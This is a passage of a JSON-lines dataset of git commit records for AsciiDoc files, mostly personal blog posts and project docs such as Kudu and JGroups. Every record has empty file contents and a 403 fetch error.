Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-18-Avenger-Elite-for-XBOX-360-Controller-Unboxing-u0026-First-Look.adoc","new_file":"_posts\/2014-04-18-Avenger-Elite-for-XBOX-360-Controller-Unboxing-u0026-First-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f571f916f2f2df4387e902500d83a8e36ff1d467","subject":"Update 2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","message":"Update 
2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","new_file":"_posts\/2015-09-30-Installing-MySQL-ConnectorPython-using-pip-15-and-later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276b213a801c15556a58302b4de724e0a2640391","subject":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","message":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a74903814451fdc123c587f4f5cb23a31f06f1f3","subject":"Renamed '_posts\/2017-08-18-How-a-developer-could-short-their-way-on-the-Ansible-learning.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Renamed '_posts\/2017-08-18-How-a-developer-could-short-their-way-on-the-Ansible-learning.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f0d0062f03b1b631ce48a8808e013669778208","subject":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to '_posts\/2019-07-02-Kafka-integration-tests.adoc'","message":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to '_posts\/2019-07-02-Kafka-integration-tests.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-07-02-Kafka-integration-tests.adoc","new_file":"_posts\/2019-07-02-Kafka-integration-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"873ea285a9bd5a5f2ef730b8fa5c8d10aa564d69","subject":"Update 2015-09-11-As.adoc","message":"Update 
2015-09-11-As.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-11-As.adoc","new_file":"_posts\/2015-09-11-As.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73c7281a010d0278295754c53c57088bff64a307","subject":"Update 2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","message":"Update 2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-I-the-workshop-about-Haxe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a52bd018d49eb92c88328b648193febb2687d54d","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b72501db8c99377aabafe928864804399045381","subject":"Update 2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","message":"Update 2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","new_file":"_posts\/2018-06-13-Chronicle-downloads-exceed-6-million-in-a-month.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ece864c14545dc062594c3a883531dbac47bc6f","subject":"Update 2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","message":"Update 2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","repos":"olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io","old_file":"_posts\/2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","new_file":"_posts\/2017-05-27-Real-World-Example-for-Google-Cloud-Spanner-JPA-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olavloite\/olavloite.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a0bfe38fc7ac147a799fd040f09b710779dc21","subject":"changed \"details\" to \"detail\" for better flow","message":"changed \"details\" 
to \"detail\" for better flow","repos":"deepnarsay\/JGroups,deepnarsay\/JGroups,TarantulaTechnology\/JGroups,ligzy\/JGroups,dimbleby\/JGroups,belaban\/JGroups,dimbleby\/JGroups,rhusar\/JGroups,rpelisse\/JGroups,kedzie\/JGroups,rpelisse\/JGroups,ligzy\/JGroups,TarantulaTechnology\/JGroups,vjuranek\/JGroups,pferraro\/JGroups,danberindei\/JGroups,kedzie\/JGroups,danberindei\/JGroups,deepnarsay\/JGroups,pruivo\/JGroups,vjuranek\/JGroups,slaskawi\/JGroups,kedzie\/JGroups,pferraro\/JGroups,rpelisse\/JGroups,Sanne\/JGroups,rhusar\/JGroups,danberindei\/JGroups,TarantulaTechnology\/JGroups,belaban\/JGroups,pferraro\/JGroups,rhusar\/JGroups,slaskawi\/JGroups,slaskawi\/JGroups,pruivo\/JGroups,dimbleby\/JGroups,ligzy\/JGroups,vjuranek\/JGroups,belaban\/JGroups,pruivo\/JGroups,Sanne\/JGroups,Sanne\/JGroups","old_file":"doc\/manual\/blocks.adoc","new_file":"doc\/manual\/blocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pferraro\/JGroups.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36445904cb16b69a01b0ae7ddb55144197ad44a7","subject":"docs: clarify guidelines on boost usage","message":"docs: clarify guidelines on boost usage\n\nChange-Id: I788ac1426a6a79192e1cdd88892cb2fa1a978b47\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5752\nReviewed-by: David Ribeiro Alves <78b9f953b197533e9b51c860b080869056433b48@apache.org>\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bc9f803f882d0608f794a2f69f529c5fe2c6b68","subject":"[doc] update on shared_ptr\/scoped_refptr pros\/cons","message":"[doc] update on shared_ptr\/scoped_refptr pros\/cons\n\nChange-Id: I46678a28a623c7b9c0835177e08a3f2393ed13c1\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4050\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Kudu 
Jenkins\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fc8cc3a6c1b5f27d404bf7d8db17f3ac7101939","subject":"[doc] Remove beta upgrade reference","message":"[doc] Remove beta upgrade reference\n\nChange-Id: Ibde3132f3bffd1ca81d249fa9401d408dd47ff21\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6858\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a1fe4fe03c8e34b1580cdc2cf31259989712df","subject":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","message":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a9d49d4c2fabc9f4a35e0f42666049d4c574f0","subject":"Note on history topic configuration issue","message":"Note on history topic configuration 
issue\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"2018-03-16-note-on-database-history-topic-configuration.adoc","new_file":"2018-03-16-note-on-database-history-topic-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10e86264c5517f4254a35c0d1828d3a2d41e781a","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d578c2eeb235bedaeeb110ac3413be5aecb4f1","subject":"usage example for apoc.cypher.runTimeboxed","message":"usage example for apoc.cypher.runTimeboxed\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runTimeboxed.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runTimeboxed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"944ecc9343505d9e77d03bd54db2c0b2c15f5e02","subject":"Update 2015-02-13-Hi-Instagram.adoc","message":"Update 2015-02-13-Hi-Instagram.adoc","repos":"HubPress\/demo.hubpress.io,HubPress\/demo.hubpress.io","old_file":"_posts\/2015-02-13-Hi-Instagram.adoc","new_file":"_posts\/2015-02-13-Hi-Instagram.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/demo.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ffdbc07c33823697833de754e9e2c476ec5396e","subject":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","message":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34234a7b8ee63033d4872cbd453673dbb84a56ff","subject":"add manually post","message":"add manually 
post\n","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2011-10-04-Day-One---Arquillian--the-Extendable-Enterprise-Application-Test-Platform.adoc","new_file":"_posts\/2011-10-04-Day-One---Arquillian--the-Extendable-Enterprise-Application-Test-Platform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b033d2dec7c8cbdb510dc5b4c769b8af7eda80c8","subject":"Clean step 2","message":"Clean step 2\n","repos":"Ovea\/bdd-todolist,Ovea\/bdd-todolist","old_file":"step-2\/src\/main\/asciidoc\/index.adoc","new_file":"step-2\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ovea\/bdd-todolist.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4141bcf0b328f7aba606ed46830dd4890afe1581","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"594f59453fb6000bd9d77892fdec49def725fa97","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f8967332c6a0c170185097db0cbeaa015dd1a3","subject":"Update 2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","message":"Update 2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","new_file":"_posts\/2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82451e14bf3776176588e13ebba0179ac0d57ae7","subject":"Update 2016-02-10-Gradle-and-C-C.adoc","message":"Update 
2016-02-10-Gradle-and-C-C.adoc","repos":"benignbala\/benignbala.hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io","old_file":"_posts\/2016-02-10-Gradle-and-C-C.adoc","new_file":"_posts\/2016-02-10-Gradle-and-C-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/benignbala.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"198b993e3da698ecd63439498a4ce87798a9e5f2","subject":"Update 2017-04-30-Verbrecherisch.adoc","message":"Update 2017-04-30-Verbrecherisch.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-30-Verbrecherisch.adoc","new_file":"_posts\/2017-04-30-Verbrecherisch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9002e73b8826a4526088038aa23038d9fe8dc9c","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"968a109471325b9cbd86f0b63b3e742a6e8c86c7","subject":"Introduce implemetation note for 12403\/12404.","message":"Introduce implemetation note for 12403\/12404.\n","repos":"leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12403_12404_project_marking_issues\/12403_12404_project_marking_issues.int.adoc","new_file":"doc-bridgepoint\/notes\/12403_12404_project_marking_issues\/12403_12404_project_marking_issues.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"f36247a2502940d5e1b10298fe569c4e2a7675ec","subject":"Update 2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","message":"Update 2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","repos":"quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io","old_file":"_posts\/2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","new_file":"_posts\/2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quentindemolliens\/quentindemolliens.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adb5c1860aa5fde5565f4c8cab7753613503ee06","subject":"Update 2018-11-28-vr-programing.adoc","message":"Update 2018-11-28-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-28-vr-programing.adoc","new_file":"_posts\/2018-11-28-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e97a04e05a5eae2306f1752fac5512c4371afd05","subject":"Update 2016-02-10-Hello-World.adoc","message":"Update 2016-02-10-Hello-World.adoc","repos":"al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io","old_file":"_posts\/2016-02-10-Hello-World.adoc","new_file":"_posts\/2016-02-10-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/al1enSuu\/al1enSuu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b1adb05428256b6af9c29bf60ab5ef44dd6b4eb","subject":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","message":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c33d8063bb09868307ac744e273a3f998301133e","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/12\/02\/deref.adoc","new_file":"content\/news\/2021\/12\/02\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e1881e6aea7750cba5663d14a19f860823c746fd","subject":"add deref","message":"add 
